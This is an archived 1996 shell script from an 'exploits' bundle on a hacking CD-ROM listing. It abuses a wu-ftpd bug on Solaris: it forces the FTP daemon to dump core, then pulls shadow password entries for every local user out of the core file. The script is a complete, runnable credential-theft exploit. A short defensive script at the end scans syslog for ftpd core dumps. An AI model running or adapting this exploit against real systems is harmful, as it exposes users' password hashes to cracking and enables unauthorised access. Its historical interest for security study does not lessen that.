home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Freaks Macintosh Archive
/
Freaks Macintosh Archive.bin
/
Freaks Macintosh Archives
/
Hacking & Misc
/
bundle of exploits.sit
/
bundle of exploits
/
wuftpd-sdump.sh
< prev
next >
Wrap
Linux/UNIX/POSIX Shell Script
|
1998-07-17
|
1KB
|
70 lines
#!/bin/sh
#
# exploit a bug in wu-ftpd to assemble & view the shadow passwd file
#
# Tested under Solaris 2.5
#
# James Abendschan jwa@nbs.nau.edu 16 Oct 1996
#
USER=`whoami`
/usr/ucb/echo -n "Enter your password for localhost: "
read PASS
WDIR=/tmp/wu-ftpd-sploit.$USER
rm -rf $WDIR
mkdir $WDIR
TMP=$WDIR/strings.tmp
ftp -n localhost << _EOF_
quote user $USER
quote pass $PASS
cd $WDIR
user root woot
quote pasv
_EOF_
if [ ! -f $WDIR/core ]
then
echo "Sorry, your ftpd didn't dump core."
exit 1
fi
strings $WDIR/core > $WDIR/tmp
# try to assemble as much of the shadow passwd file as possible
# (easier in perl)
for user in `cat /etc/passwd | awk -F":" '{print $1}'`
do
line=`grep \^${user}: $WDIR/tmp`
echo $line
done
rm -f $TMP
----------------------------------------------------------------------------
# Here is another script to -
# try to identify who's been core dumping ftpd
#
# requires ftpd to be wrapped (obviously)
#
# jwa 24 Oct 1996
#
LOG=/var/adm/syslog
for pid in `grep "exiting on signal" $LOG | awk -F"[" '{print $2}' | awk -F"]" '
{print $1}'`
do
grep $pid $LOG | grep ftpd
echo " "
done